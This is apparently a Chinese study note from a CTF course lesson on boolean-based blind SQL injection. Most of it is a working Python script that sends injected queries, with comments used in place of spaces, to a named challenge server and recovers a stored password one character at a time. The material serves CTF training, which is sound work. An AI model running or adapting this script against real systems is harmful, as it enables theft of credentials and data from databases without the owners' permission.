布尔型注入

本文是对安全牛《CTF从入门到提升》课程课时5的记录

布尔型盲注其实和基于时间盲注差不多，不单独讲了，直接上一道题目
http://106.12.37.37:8080/level2/
直接给出脚本

import requests

dicts = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}_@'

flag = ''

for i in range(1,50):
    for x in dicts:
        url = 'http://106.12.37.37:8080/level2/?token=21232f297a57a5a743894a0e4a801fc3&userid=(ascii(substr((select/**/password/**/from/**/user/**/limit/**/1)/**/from/**/%d/**/for/**/1))=%d)&password=1'%(i,ord(x))
        try:
            response = requests.get(url,timeout=5)
            if str(response.content).find('error password!') != -1: #这里要注意response.content不是str，不能直接用find
                flag += x
                print(flag)
                break
        except Exception:
            pass

print(flag)